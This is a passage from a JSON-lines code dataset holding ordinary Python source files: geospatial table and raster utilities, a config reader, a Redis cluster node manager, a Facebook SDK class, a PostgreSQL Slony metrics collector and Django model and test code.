{csv_header_0: valuea, csv_header_1: valueb...}}\n\n if ``to_lower`` all strings including key_fields and values are\n converted to lowercase unicode.\n\n Raise:\n ValueError\n If ValueError occurs during conversion to dictionary.\n KeyError\n If ``key_field`` is not present during ``set_index`` call.\n \"\"\"\n # Reassign to avoid mutation\n col_list = column_list\n # if a list of columns are provided to use and return, make sure\n # 'key_field' is one of them.\n if col_list and key_field not in col_list:\n col_list.append(key_field)\n\n table = read_csv_to_dataframe(\n table_path, to_lower=to_lower, sep=None, index_col=False,\n engine='python')\n\n # if 'to_lower`, case handling is done before trying to access the data.\n # the columns are stripped of leading/trailing whitespace in\n # ``read_csv_to_dataframe``, and also lowercased if ``to_lower`` so we only\n # need to convert the rest of the table.\n if to_lower:\n key_field = key_field.lower()\n # lowercase column names\n if col_list:\n col_list = [col.lower() for col in col_list]\n # lowercase values\n table = table.applymap(\n lambda x: x.lower() if isinstance(x, str) else x)\n\n # Set 'key_field' as the index of the dataframe\n try:\n table.set_index(key_field, drop=False, inplace=True)\n except KeyError:\n # If 'key_field' is not a column then KeyError is raised for using\n # it as the index column\n LOGGER.error(f\"'key_field' : '{key_field}' could not be found as a\"\n f\" column in the table. Table path: {table_path}.\")\n raise\n\n # Subset dataframe by columns if desired\n if col_list:\n table = table.loc[:, col_list]\n\n # look for NaN values and warn if any are found.\n table_na = table.isna()\n if table_na.values.any():\n LOGGER.warning(\n f\"Empty or NaN values were found in the table: {table_path}.\")\n # look to see if an entire row is NA values\n table_na_rows = table_na.all(axis=1)\n na_rows = table_na_rows.index[table_na_rows].tolist()\n # if a completely empty row, drop it\n if na_rows:\n LOGGER.warning(\n \"Encountered an entirely blank row on line(s)\"\n f\" {[x+2 for x in na_rows]}. Dropping rows from table.\")\n table.dropna(how=\"all\", inplace=True)\n # fill the rest of empty or NaN values with empty string\n table.fillna(value=\"\", inplace=True)\n try:\n lookup_dict = table.to_dict(orient='index')\n except ValueError:\n # If 'key_field' is not unique then a value error is raised.\n LOGGER.error(f\"The 'key_field' : '{key_field}' column values are not\"\n f\" unique: {table.index.tolist()}\")\n raise\n\n return lookup_dict\n\n\ndef read_csv_to_dataframe(\n path, to_lower=False, sep=None, encoding=None, engine='python',\n **kwargs):\n \"\"\"Return a dataframe representation of the CSV.\n\n Wrapper around ``pandas.read_csv`` that standardizes the column names by\n stripping leading/trailing whitespace and optionally making all lowercase.\n This helps avoid common errors caused by user-supplied CSV files with\n column names that don't exactly match the specification.\n\n Args:\n path (string): path to a CSV file\n to_lower (bool): if True, convert all column names to lowercase\n sep: separator to pass to pandas.read_csv. Defaults to None, which\n lets the Python engine infer the separator (if engine='python').\n encoding (string): name of encoding codec to pass to `pandas.read_csv`.\n Defaults to None. Setting engine='python' when encoding=None allows\n a lot of non-UTF8 encodings to be read without raising an error.\n Any special characters in other encodings may get replaced with the\n replacement character.\n If encoding=None, and the file begins with a BOM, the encoding gets\n set to 'utf-8-sig'; otherwise the BOM causes an error.\n engine (string): kwarg for pandas.read_csv: 'c', 'python', or None.\n Defaults to 'python' (see note about encoding).\n **kwargs: any kwargs that are valid for ``pandas.read_csv``\n\n Returns:\n pandas.DataFrame with the contents of the given CSV\n\n \"\"\"\n # Check if the file encoding is UTF-8 BOM first\n # allow encoding kwarg to override this if it's provided\n if not encoding and has_utf8_bom(path):\n encoding = 'utf-8-sig'\n try:\n dataframe = pandas.read_csv(path, engine=engine, encoding=encoding,\n sep=sep, **kwargs)\n except UnicodeDecodeError as error:\n LOGGER.error(\n f'{path} must be encoded as utf-8 or ASCII')\n raise error\n\n # this won't work on integer types, which happens if you set header=None\n # however, there's little reason to use this function if there's no header\n dataframe.columns = dataframe.columns.str.strip()\n if to_lower:\n dataframe.columns = dataframe.columns.str.lower()\n\n return dataframe\n\n\ndef make_directories(directory_list):\n \"\"\"Create directories in `directory_list` if they do not already exist.\"\"\"\n if not isinstance(directory_list, list):\n raise ValueError(\n \"Expected `directory_list` to be an instance of `list` instead \"\n \"got type %s instead\", type(directory_list))\n\n for path in directory_list:\n # From http://stackoverflow.com/a/14364249/42897\n try:\n os.makedirs(path)\n except OSError:\n if not os.path.isdir(path):\n raise\n\n\ndef mean_pixel_size_and_area(pixel_size_tuple):\n \"\"\"Convert to mean and raise Exception if they are not close.\n\n Parameter:\n pixel_size_tuple (tuple): a 2 tuple indicating the x/y size of a\n pixel.\n\n Returns:\n tuple of (mean absolute average of pixel_size, area of pixel size)\n\n Raises:\n ValueError if the dimensions of pixel_size_tuple are not almost\n square.\n\n \"\"\"\n x_size, y_size = abs(pixel_size_tuple[0]), abs(pixel_size_tuple[1])\n if not numpy.isclose(x_size, y_size):\n raise ValueError(\n \"pixel size is not square. dimensions: %s\" % repr(\n pixel_size_tuple))\n\n return (x_size, x_size*y_size)\n\n\ndef create_coordinate_transformer(\n base_ref, target_ref,\n osr_axis_mapping_strategy=DEFAULT_OSR_AXIS_MAPPING_STRATEGY):\n \"\"\"Create a spatial reference coordinate transformation function.\n\n Args:\n base_ref (osr spatial reference): A defined spatial reference to\n transform FROM\n target_ref (osr spatial reference): A defined spatial reference\n to transform TO\n osr_axis_mapping_strategy (int): OSR axis mapping strategy for\n ``SpatialReference`` objects. Defaults to\n ``utils.DEFAULT_OSR_AXIS_MAPPING_STRATEGY``. This parameter should\n not be changed unless you know what you are doing.\n\n Returns:\n An OSR Coordinate Transformation object\n\n \"\"\"\n # Make a copy of the base and target spatial references to avoid side\n # effects from mutation of setting the axis mapping strategy\n base_ref_wkt = base_ref.ExportToWkt()\n target_ref_wkt = target_ref.ExportToWkt()\n\n base_ref_copy = osr.SpatialReference()\n target_ref_copy = osr.SpatialReference()\n\n base_ref_copy.ImportFromWkt(base_ref_wkt)\n target_ref_copy.ImportFromWkt(target_ref_wkt)\n\n base_ref_copy.SetAxisMappingStrategy(osr_axis_mapping_strategy)\n target_ref_copy.SetAxisMappingStrategy(osr_axis_mapping_strategy)\n\n transformer = osr.CreateCoordinateTransformation(\n base_ref_copy, target_ref_copy)\n return transformer\n\n\ndef _assert_vectors_equal(\n expected_vector_path, actual_vector_path, field_value_atol=1e-3):\n \"\"\"Assert two vectors are equal.\n\n Assert spatial reference, feature count, geometries, field names, and\n values are equal with no respect to order of field names or geometries.\n\n Args:\n actual_vector_path (string): path on disk to a gdal Vector dataset.\n expected_vector_path (string): path on disk to a gdal Vector dataset\n to use as the ground truth.\n field_value_atol (float): the absolute tolerance for comparing field\n attribute values, default=1e-3.\n\n Returns:\n None on success\n\n Raise:\n AssertionError\n If vector projections, feature counts, field names, or geometries\n do not match.\n \"\"\"\n try:\n # Open vectors\n actual_vector = gdal.OpenEx(actual_vector_path, gdal.OF_VECTOR)\n actual_layer = actual_vector.GetLayer()\n expected_vector = gdal.OpenEx(expected_vector_path, gdal.OF_VECTOR)\n expected_layer = expected_vector.GetLayer()\n\n # Check projections\n expected_projection = expected_layer.GetSpatialRef()\n expected_projection_wkt = expected_projection.ExportToWkt()\n actual_projection = actual_layer.GetSpatialRef()\n actual_projection_wkt = actual_projection.ExportToWkt()\n if expected_projection_wkt != actual_projection_wkt:\n raise AssertionError(\n \"Vector projections are not the same. \\n\"\n f\"Expected projection wkt: {expected_projection_wkt}. \\n\"\n f\"Actual projection wkt: {actual_projection_wkt}. \")\n\n # Check feature count\n actual_feat_count = actual_layer.GetFeatureCount()\n expected_feat_count = expected_layer.GetFeatureCount()\n if expected_feat_count != actual_feat_count:\n raise AssertionError(\n \"Vector feature counts are not the same. \\n\"\n f\"Expected feature count: {expected_feat_count}. \\n\"\n f\"Actual feature count: {actual_feat_count}. \")\n\n # Check field names\n expected_field_names = [field.name for field in expected_layer.schema]\n actual_field_names = [field.name for field in actual_layer.schema]\n if sorted(expected_field_names) != sorted(actual_field_names):\n raise AssertionError(\n \"Vector field names are not the same. \\n\"\n f\"Expected field names: {sorted(expected_field_names)}. \\n\"\n f\"Actual field names: {sorted(actual_field_names)}. \")\n\n # Check field values and geometries\n for expected_feature in expected_layer:\n fid = expected_feature.GetFID()\n expected_values = [\n expected_feature.GetField(field)\n for field in expected_field_names]\n\n actual_feature = actual_layer.GetFeature(fid)\n actual_values = [\n actual_feature.GetField(field)\n for field in expected_field_names]\n\n for av, ev in zip(actual_values, expected_values):\n if av is not None:\n # Number comparison\n if isinstance(av, int) or isinstance(av, float):\n if not numpy.allclose(numpy.array([av]),\n numpy.array([ev]),\n atol=field_value_atol):\n raise AssertionError(\n \"Vector field values are not equal: \\n\"\n f\"Expected value: {ev}. \\n\"\n f\"Actual value: {av}. \")\n # String and other comparison\n else:\n if av != ev:\n raise AssertionError(\n \"Vector field values are not equal. \\n\"\n f\"Expected value : {ev}. \\n\"\n f\"Actual value : {av}. \")\n else:\n if ev is not None:\n raise AssertionError(\n \"Vector field values are not equal: \\n\"\n f\"Expected value: {ev}. \\n\"\n f\"Actual value: {av}. \")\n\n expected_geom = expected_feature.GetGeometryRef()\n expected_geom_wkt = expected_geom.ExportToWkt()\n actual_geom = actual_feature.GetGeometryRef()\n actual_geom_wkt = actual_geom.ExportToWkt()\n expected_geom_shapely = loads(expected_geom_wkt)\n actual_geom_shapely = loads(actual_geom_wkt)\n # Try comparing geoms exactly equal allowing for different\n # geometry ordering\n geoms_equal = expected_geom_shapely.equals(actual_geom_shapely)\n if not geoms_equal:\n # Try almost_equal allowing for precision differences\n geoms_almost_eq = expected_geom_shapely.almost_equals(\n actual_geom_shapely)\n if not geoms_almost_eq:\n raise AssertionError(\n \"Vector geometry assertion fail. \\n\"\n f\"Expected geometry: {expected_geom_wkt}. \\n\"\n f\"Actual geometry: {actual_geom_wkt}. \")\n\n expected_feature = None\n actual_feature = None\n finally:\n actual_layer = None\n actual_vector = None\n expected_layer = None\n expected_vector = None\n\n return None\n\n\ndef has_utf8_bom(textfile_path):\n \"\"\"Determine if the text file has a UTF-8 byte-order marker.\n\n Args:\n textfile_path (str): The path to a file on disk.\n\n Returns:\n A bool indicating whether the textfile has a BOM. If ``True``, a BOM\n is present.\n\n \"\"\"\n with open(textfile_path, 'rb') as file_obj:\n first_line = file_obj.readline()\n return first_line.startswith(codecs.BOM_UTF8)\n\n\ndef reclassify_raster(\n raster_path_band, value_map, target_raster_path, target_datatype,\n target_nodata, error_details):\n \"\"\"A wrapper function for calling ``pygeoprocessing.reclassify_raster``.\n\n This wrapper function is helpful when added as a ``TaskGraph.task`` so\n a better error message can be provided to the users if a\n ``pygeoprocessing.ReclassificationMissingValuesError`` is raised.\n\n Args:\n raster_path_band (tuple): a tuple including file path to a raster\n and the band index to operate over. ex: (path, band_index)\n value_map (dictionary): a dictionary of values of\n {source_value: dest_value, ...} where source_value's type is the\n same as the values in ``base_raster_path`` at band ``band_index``.\n Must contain at least one value.\n target_raster_path (string): target raster output path; overwritten if\n it exists\n target_datatype (gdal type): the numerical type for the target raster\n target_nodata (numerical type): the nodata value for the target raster\n Must be the same type as target_datatype\n error_details (dict): a dictionary with key value pairs that provide\n more context for a raised\n ``pygeoprocessing.ReclassificationMissingValuesError``.\n keys must be {'raster_name', 'column_name', 'table_name'}. Values\n each key represent:\n\n 'raster_name' - string for the raster name being reclassified\n 'column_name' - name of the table column that ``value_map`` \n dictionary keys came from.\n 'table_name' - table name that ``value_map`` came from.\n\n Returns:\n None\n\n Raises:\n ValueError if ``values_required`` is ``True`` and a pixel value from\n ``raster_path_band`` is not a key in ``value_map``.\n \"\"\"\n # Error early if 'error_details' keys are invalid\n raster_name = error_details['raster_name']\n column_name = error_details['column_name']\n table_name = error_details['table_name']\n\n try:\n pygeoprocessing.reclassify_raster(\n raster_path_band, value_map, target_raster_path, target_datatype,\n target_nodata, values_required=True)\n except pygeoprocessing.ReclassificationMissingValuesError as err:\n error_message = (\n f\"Values in the {raster_name} raster were found that are not\"\n f\" represented under the '{column_name}' column of the\"\n f\" {table_name} table. The missing values found in the\"\n f\" {raster_name} raster but not the table are:\"\n f\" {err.missing_values}.\")\n raise ValueError(error_message)\n"} {"ext": "py", "sha": "1a2ef3fa7e4c4bad44a2303092c2343e9f7d4fe5", "content": "from configparser import ConfigParser\n\n\nclass GetconfigData:\n \"\"\"\n Class used to access config.ini data\n \"\"\"\n\n def __init__(self):\n # instantiate\n self.config = ConfigParser()\n # parse existing file\n self.config.read('config.ini')\n\n def GetClientId():\n \"\"\"\n Function used by main.py to get the Client ID from the config.ini file\n\n Returns:\n client_ID: The client ID used to get data \n \"\"\"\n # Create object\n get_client_id = GetconfigData()\n # read values from a section\n client_id = get_client_id.config.get('config', 'client_id')\n\n return client_id\n\n def GetAccessToken():\n \"\"\"\n Function used by main.py to get the Access Token from the config.ini file\n\n Returns:\n access_token: The Access Token used to get data \n \"\"\"\n # Create object\n get_access_token = GetconfigData()\n # read values from a section\n access_token = get_access_token.config.get('config', 'access_token')\n\n return access_token\n"} {"ext": "py", "sha": "1a2ef438f0bf0c43b3ee10f8857977d69781a6f3", "content": "# -*- coding: utf-8 -*-\n\n# python std lib\nimport random\n\n# rediscluster imports\nfrom .crc import crc16\nfrom .exceptions import RedisClusterException, RedisClusterConfigError\n\n# 3rd party imports\nfrom redis import Redis\nfrom redis._compat import unicode, long, basestring\nfrom redis.connection import Encoder\nfrom redis import ConnectionError, TimeoutError, ResponseError\n\n\nclass NodeManager(object):\n \"\"\"\n \"\"\"\n RedisClusterHashSlots = 16384\n\n def __init__(self, startup_nodes=None, reinitialize_steps=None, skip_full_coverage_check=False, nodemanager_follow_cluster=False,\n host_port_remap=None, **connection_kwargs):\n \"\"\"\n :skip_full_coverage_check:\n Skips the check of cluster-require-full-coverage config, useful for clusters\n without the CONFIG command (like aws)\n :nodemanager_follow_cluster:\n The node manager will during initialization try the last set of nodes that\n it was operating on. This will allow the client to drift along side the cluster\n if the cluster nodes move around alot.\n \"\"\"\n self.connection_kwargs = connection_kwargs\n self.nodes = {}\n self.slots = {}\n self.startup_nodes = [] if startup_nodes is None else startup_nodes\n self.orig_startup_nodes = [node for node in self.startup_nodes]\n self.reinitialize_counter = 0\n self.reinitialize_steps = reinitialize_steps or 25\n self._skip_full_coverage_check = skip_full_coverage_check\n self.nodemanager_follow_cluster = nodemanager_follow_cluster\n self.encoder = Encoder(\n connection_kwargs.get('encoding', 'utf-8'),\n connection_kwargs.get('encoding_errors', 'strict'),\n connection_kwargs.get('decode_responses', False)\n )\n self._validate_host_port_remap(host_port_remap)\n self.host_port_remap = host_port_remap\n\n if not self.startup_nodes:\n raise RedisClusterException(\"No startup nodes provided\")\n\n def _validate_host_port_remap(self, host_port_remap):\n \"\"\"\n Helper method that validates all entries in the host_port_remap config.\n \"\"\"\n if host_port_remap is None:\n # Nothing to validate if config not set\n return\n\n if not isinstance(host_port_remap, list):\n raise RedisClusterConfigError(\"host_port_remap must be a list\")\n\n for item in host_port_remap:\n if not isinstance(item, dict):\n raise RedisClusterConfigError(\"items inside host_port_remap list must be of dict type\")\n\n # If we have from_host, we must have a to_host option to allow for translation to work\n if ('from_host' in item and 'to_host' not in item) or ('from_host' not in item and 'to_host' in item):\n raise RedisClusterConfigError(\"Both from_host and to_host must be present in remap item if either is defined\")\n\n if ('from_port' in item and 'to_port' not in item) or ('from_port' not in item and 'to_port' in item):\n raise RedisClusterConfigError(\"Both from_port and to_port must be present in remap item\")\n\n def keyslot(self, key):\n \"\"\"\n Calculate keyslot for a given key.\n Tuned for compatibility with python 2.7.x\n \"\"\"\n k = self.encoder.encode(key)\n\n start = k.find(b\"{\")\n\n if start > -1:\n end = k.find(b\"}\", start + 1)\n if end > -1 and end != start + 1:\n k = k[start + 1:end]\n\n return crc16(k) % self.RedisClusterHashSlots\n\n def node_from_slot(self, slot):\n \"\"\"\n \"\"\"\n for node in self.slots[slot]:\n if node['server_type'] == 'master':\n return node\n\n def all_nodes(self):\n \"\"\"\n \"\"\"\n for node in self.nodes.values():\n yield node\n\n def all_masters(self):\n \"\"\"\n \"\"\"\n for node in self.nodes.values():\n if node[\"server_type\"] == \"master\":\n yield node\n\n def random_startup_node(self):\n \"\"\"\n \"\"\"\n random.shuffle(self.startup_nodes)\n\n return self.startup_nodes[0]\n\n def random_startup_node_ittr(self):\n \"\"\"\n Generator that will return a random startup nodes. Works as a generator.\n \"\"\"\n while True:\n yield random.choice(self.startup_nodes)\n\n def random_node(self):\n \"\"\"\n \"\"\"\n key = random.choice(list(self.nodes.keys()))\n\n return self.nodes[key]\n\n def get_redis_link(self, host, port, decode_responses=False):\n \"\"\"\n \"\"\"\n allowed_keys = (\n 'host',\n 'port',\n 'db',\n 'username',\n 'password',\n 'socket_timeout',\n 'socket_connect_timeout',\n 'socket_keepalive',\n 'socket_keepalive_options',\n 'connection_pool',\n 'unix_socket_path',\n 'encoding',\n 'encoding_errors',\n 'charset',\n 'errors',\n 'decode_responses',\n 'retry_on_timeout',\n 'ssl',\n 'ssl_keyfile',\n 'ssl_certfile',\n 'ssl_cert_reqs',\n 'ssl_ca_certs',\n 'max_connections',\n )\n disabled_keys = (\n 'host',\n 'port',\n 'decode_responses',\n )\n connection_kwargs = {k: v for k, v in self.connection_kwargs.items() if k in set(allowed_keys) - set(disabled_keys)}\n return Redis(host=host, port=port, decode_responses=decode_responses, **connection_kwargs)\n\n def initialize(self):\n \"\"\"\n Init the slots cache by asking all startup nodes what the current cluster configuration is\n \"\"\"\n nodes_cache = {}\n tmp_slots = {}\n\n all_slots_covered = False\n disagreements = []\n startup_nodes_reachable = False\n\n nodes = self.orig_startup_nodes\n\n # With this option the client will attempt to connect to any of the previous set of nodes instead of the original set of nodes\n if self.nodemanager_follow_cluster:\n nodes = self.startup_nodes\n\n for node in nodes:\n try:\n r = self.get_redis_link(host=node[\"host\"], port=node[\"port\"], decode_responses=True)\n cluster_slots = r.execute_command(\"cluster\", \"slots\")\n startup_nodes_reachable = True\n except (ConnectionError, TimeoutError):\n continue\n except ResponseError as e:\n # Isn't a cluster connection, so it won't parse these exceptions automatically\n message = e.__str__()\n if 'CLUSTERDOWN' in message or 'MASTERDOWN' in message:\n continue\n else:\n raise RedisClusterException(\"ERROR sending 'cluster slots' command to redis server: {0}\".format(node))\n except Exception:\n raise RedisClusterException(\"ERROR sending 'cluster slots' command to redis server: {0}\".format(node))\n\n all_slots_covered = True\n\n # If there's only one server in the cluster, its ``host`` is ''\n # Fix it to the host in startup_nodes\n if (len(cluster_slots) == 1 and len(cluster_slots[0][2][0]) == 0 and len(self.startup_nodes) == 1):\n cluster_slots[0][2][0] = self.startup_nodes[0]['host']\n\n # No need to decode response because Redis should handle that for us...\n for slot in cluster_slots:\n master_node = slot[2]\n\n if master_node[0] == '':\n master_node[0] = node['host']\n master_node[1] = int(master_node[1])\n\n master_node = self.remap_internal_node_object(master_node)\n\n node, node_name = self.make_node_obj(master_node[0], master_node[1], 'master')\n nodes_cache[node_name] = node\n\n for i in range(int(slot[0]), int(slot[1]) + 1):\n if i not in tmp_slots:\n tmp_slots[i] = [node]\n slave_nodes = [slot[j] for j in range(3, len(slot))]\n\n for slave_node in slave_nodes:\n slave_node = self.remap_internal_node_object(slave_node)\n target_slave_node, slave_node_name = self.make_node_obj(slave_node[0], slave_node[1], 'slave')\n nodes_cache[slave_node_name] = target_slave_node\n tmp_slots[i].append(target_slave_node)\n else:\n # Validate that 2 nodes want to use the same slot cache setup\n if tmp_slots[i][0]['name'] != node['name']:\n disagreements.append(\"{0} vs {1} on slot: {2}\".format(\n tmp_slots[i][0]['name'], node['name'], i),\n )\n\n if len(disagreements) > 5:\n raise RedisClusterException(\"startup_nodes could not agree on a valid slots cache. {0}\".format(\", \".join(disagreements)))\n\n self.populate_startup_nodes()\n self.refresh_table_asap = False\n\n if self._skip_full_coverage_check:\n need_full_slots_coverage = False\n else:\n need_full_slots_coverage = self.cluster_require_full_coverage(nodes_cache)\n\n # Validate if all slots are covered or if we should try next startup node\n for i in range(0, self.RedisClusterHashSlots):\n if i not in tmp_slots and need_full_slots_coverage:\n all_slots_covered = False\n\n if all_slots_covered:\n # All slots are covered and application can continue to execute\n break\n\n if not startup_nodes_reachable:\n raise RedisClusterException(\"Redis Cluster cannot be connected. Please provide at least one reachable node.\")\n\n if not all_slots_covered:\n raise RedisClusterException(\"All slots are not covered after query all startup_nodes. {0} of {1} covered...\".format(\n len(tmp_slots), self.RedisClusterHashSlots))\n\n # Set the tmp variables to the real variables\n self.slots = tmp_slots\n self.nodes = nodes_cache\n self.reinitialize_counter = 0\n\n def remap_internal_node_object(self, node_obj):\n if not self.host_port_remap:\n # No remapping rule set, return object unmodified\n return node_obj\n\n for remap_rule in self.host_port_remap:\n if 'from_host' in remap_rule and 'to_host' in remap_rule:\n if remap_rule['from_host'] in node_obj[0]:\n # print('remapping host', node_obj[0], remap_rule['to_host'])\n node_obj[0] = remap_rule['to_host']\n\n ## The port value is always an integer\n if 'from_port' in remap_rule and 'to_port' in remap_rule:\n if remap_rule['from_port'] == node_obj[1]:\n # print('remapping port', node_obj[1], remap_rule['to_port'])\n node_obj[1] = remap_rule['to_port']\n\n return node_obj\n\n def increment_reinitialize_counter(self, ct=1):\n for i in range(min(ct, self.reinitialize_steps)):\n self.reinitialize_counter += 1\n if self.reinitialize_counter % self.reinitialize_steps == 0:\n self.initialize()\n\n def cluster_require_full_coverage(self, nodes_cache):\n \"\"\"\n if exists 'cluster-require-full-coverage no' config on redis servers,\n then even all slots are not covered, cluster still will be able to\n respond\n \"\"\"\n nodes = nodes_cache or self.nodes\n\n def node_require_full_coverage(node):\n try:\n r_node = self.get_redis_link(host=node[\"host\"], port=node[\"port\"], decode_responses=True)\n return \"yes\" in r_node.config_get(\"cluster-require-full-coverage\").values()\n except ConnectionError:\n return False\n except Exception:\n raise RedisClusterException(\"ERROR sending 'config get cluster-require-full-coverage' command to redis server: {0}\".format(node))\n\n # at least one node should have cluster-require-full-coverage yes\n return any(node_require_full_coverage(node) for node in nodes.values())\n\n def set_node_name(self, n):\n \"\"\"\n Format the name for the given node object\n\n # TODO: This shold not be constructed this way. It should update the name of the node in the node cache dict\n \"\"\"\n if \"name\" not in n:\n n[\"name\"] = \"{0}:{1}\".format(n[\"host\"], n[\"port\"])\n\n def make_node_obj(self, host, port, server_type):\n \"\"\"\n Create a node datastructure.\n\n Returns the node datastructure and the node name\n \"\"\"\n node_name = \"{0}:{1}\".format(host, port)\n node = {\n 'host': host,\n 'port': port,\n 'name': node_name,\n 'server_type': server_type\n }\n\n return (node, node_name)\n\n def set_node(self, host, port, server_type=None):\n \"\"\"\n Update data for a node.\n \"\"\"\n node, node_name = self.make_node_obj(host, port, server_type)\n self.nodes[node_name] = node\n\n return node\n\n def populate_startup_nodes(self):\n \"\"\"\n Do something with all startup nodes and filters out any duplicates\n \"\"\"\n for item in self.startup_nodes:\n self.set_node_name(item)\n\n for n in self.nodes.values():\n if n not in self.startup_nodes:\n self.startup_nodes.append(n)\n\n # freeze it so we can set() it\n uniq = {frozenset(node.items()) for node in self.startup_nodes}\n # then thaw it back out into a list of dicts\n self.startup_nodes = [dict(node) for node in uniq]\n\n def reset(self):\n \"\"\"\n Drop all node data and start over from startup_nodes\n \"\"\"\n self.initialize()\n"} {"ext": "py", "sha": "1a2ef9c250f5b0592f93c3e716253062338b9f44", "content": "# Copyright 2014 Facebook, Inc.\n\n# You are hereby granted a non-exclusive, worldwide, royalty-free license to\n# use, copy, modify, and distribute this software in source code or binary\n# form for use in connection with the web services and APIs provided by\n# Facebook.\n\n# As with any software that integrates with the Facebook platform, your use\n# of this software is subject to the Facebook Developer Principles and\n# Policies [http://developers.facebook.com/policy/]. This copyright notice\n# shall be included in all copies or substantial portions of the software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nfrom facebook_business.adobjects.abstractobject import AbstractObject\nfrom facebook_business.adobjects.abstractcrudobject import AbstractCrudObject\nfrom facebook_business.adobjects.objectparser import ObjectParser\nfrom facebook_business.api import FacebookRequest\nfrom facebook_business.typechecker import TypeChecker\n\n\"\"\"\nThis class is auto-generated.\n\nFor any issues or feature requests related to this class, please let us know on\ngithub and we'll fix in our codegen framework. We'll not be able to accept\npull request for this class.\n\"\"\"\n\nclass TargetingGeoLocationLocationCluster(\n AbstractCrudObject,\n):\n\n def __init__(self, fbid=None, parent_id=None, api=None):\n self._isTargetingGeoLocationLocationCluster = True\n super(TargetingGeoLocationLocationCluster, self).__init__(fbid, parent_id, api)\n\n class Field(AbstractObject.Field):\n key = 'key'\n id = 'id'\n\n _field_types = {\n 'key': 'int',\n 'id': 'string',\n }\n @classmethod\n def _get_field_enum_info(cls):\n field_enum_info = {}\n return field_enum_info\n\n\n"} {"ext": "py", "sha": "1a2ef9dc52649c21ee5e5267a735b624d1e5db24", "content": "# coding=utf-8\n\n\"\"\"\nCollect slony metrics from postgresql\n\n#### Dependencies\n\n * psycopg2\n\n#### Example Configuration\n\n```\nenabled = True\n\nhost = localhost\nport = 5432\nslony_node_string = Node [0-9] - [_a-z0-9]*@(.*).example.com\n\n[instances]\n\n[[database1]]\nslony_db = postgres\nslony_schema = _slony\n\n\n[[database2]]\nuser = postgres\npassword = postgres\nslony_db = data_db\nslony_node_string = Node [0-9] - [_a-z0-9]*@(.*).i.example.com\nslony_schema = _data_db\n```\n\n\"\"\"\n\nimport diamond.collector\n\ntry:\n import psycopg2\n import psycopg2.extensions\n psycopg2 # workaround for pyflakes issue #13\nexcept ImportError:\n psycopg2 = None\n\n\nclass SlonyCollector(diamond.collector.Collector):\n\n def get_default_config_help(self):\n config_help = super(SlonyCollector, self).get_default_config_help()\n config_help.update({\n 'host': 'Hostname',\n 'user': 'Username',\n 'password': 'Password',\n 'port': 'Port number',\n 'slony_node_string': 'Regex for SQL SUBSTRING to extract ' +\n 'the hostname from sl_node.no_comment',\n 'instances': 'Subcategory of slony instances that includes the ' +\n 'slony database, and slony schema to be monitored. ' +\n 'Optionally, user, password and slony_node_string ' +\n 'maybe overridden per instance (see example).'\n })\n return config_help\n\n def get_default_config(self):\n \"\"\"\n Return default config.\n \"\"\"\n config = super(SlonyCollector, self).get_default_config()\n config.update({\n 'path': 'postgres',\n 'host': 'localhost',\n 'user': 'postgres',\n 'password': 'postgres',\n 'port': 5432,\n 'slony_node_string': 'Node [0-9]+ - postgres@localhost',\n 'method': 'Threaded',\n 'instances': {},\n })\n return config\n\n def collect(self):\n if psycopg2 is None:\n self.log.error('Unable to import module psycopg2')\n return {}\n\n instances = self.config['instances']\n # HACK: setting default with subcategory messes up merging of configs,\n # so we only set the default if one wasn't provided.\n if not instances:\n instances = {\n 'default': {\n 'slony_db': 'postgres',\n 'slony_schema': '_postgres',\n }\n }\n\n for name, instance in instances.iteritems():\n host = self.config['host']\n port = self.config['port']\n user = instance.get('user') or self.config['user']\n password = instance.get('password') or self.config['password']\n slony_node_string = instance.get('slony_node_string') or \\\n self.config['slony_node_string']\n slony_db = instance['slony_db']\n slony_schema = instance['slony_schema']\n\n stats = self._get_stats_by_database(\n host, port, user, password, slony_db,\n slony_schema, slony_node_string\n )\n [self.publish(metric, value) for metric, value in stats]\n\n def _get_stats_by_database(self, host, port, user,\n password, db, schema, node_string):\n path = \"slony.%(datname)s.%(metric)s.lag_events\"\n conn = psycopg2.connect(\n host=host,\n user=user,\n password=password,\n port=port,\n database=db)\n\n # Avoid using transactions, set isolation level to autocommit\n conn.set_isolation_level(0)\n\n query = \"\"\"\n SELECT SUBSTRING(sl.no_comment FROM %(node_extractor)s) AS node,\n st.st_lag_num_events AS lag_events\n FROM %(schema)s.sl_status AS st, %(schema)s.sl_node AS sl\n WHERE sl.no_id = st.st_received\n \"\"\"\n cursor = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(query, {\n 'node_extractor': node_string,\n 'schema': psycopg2.extensions.AsIs(schema),\n })\n\n metrics = []\n for row in cursor.fetchall():\n stats = row.copy()\n metrics.append((\n path % {'datname': db, 'metric': stats.get('node')},\n stats.get('lag_events')\n ))\n return metrics\n"} {"ext": "py", "sha": "1a2efa426e0f6d38cb8ae226501c722d38d52bed", "content": "from django.db import models\nfrom accounts.models import User\n\n\nclass ExcelFile(models.Model):\n # user = models.ForeignKey(User, on_delete=models.CASCADE)\n excel_file = models.FileField(blank=True, default='')\n timestamp = models.DateTimeField(auto_now_add=True)\n"} {"ext": "py", "sha": "1a2efa4861e56582ea91b6f361894c41ffe65061", "content": "from unittest import mock\n\nfrom django.conf import settings\nfrom django.test import TestCase, override_settings\n\nfrom daiquiri.jobs.tests.mixins import AsyncTestMixin\nfrom daiquiri.query.models import QueryJob, Example\n\n\n@override_settings(QUERY_ANONYMOUS=True)\n@mock.patch(settings.ADAPTER_DATABASE + '.submit_query', mock.Mock())\n@mock.patch(settings.ADAPTER_DATABASE + '.fetch_nrows', mock.Mock(return_value=100))\n@mock.patch(settings.ADAPTER_DATABASE + '.fetch_size', mock.Mock(return_value=100))\n@mock.patch(settings.ADAPTER_DATABASE + '.count_rows', mock.Mock(return_value=100))\n@mock.patch(settings.ADAPTER_DATABASE + '.rename_table', mock.Mock())\n@mock.patch(settings.ADAPTER_DATABASE + '.drop_table', mock.Mock())\n@mock.patch(settings.ADAPTER_DATABASE + 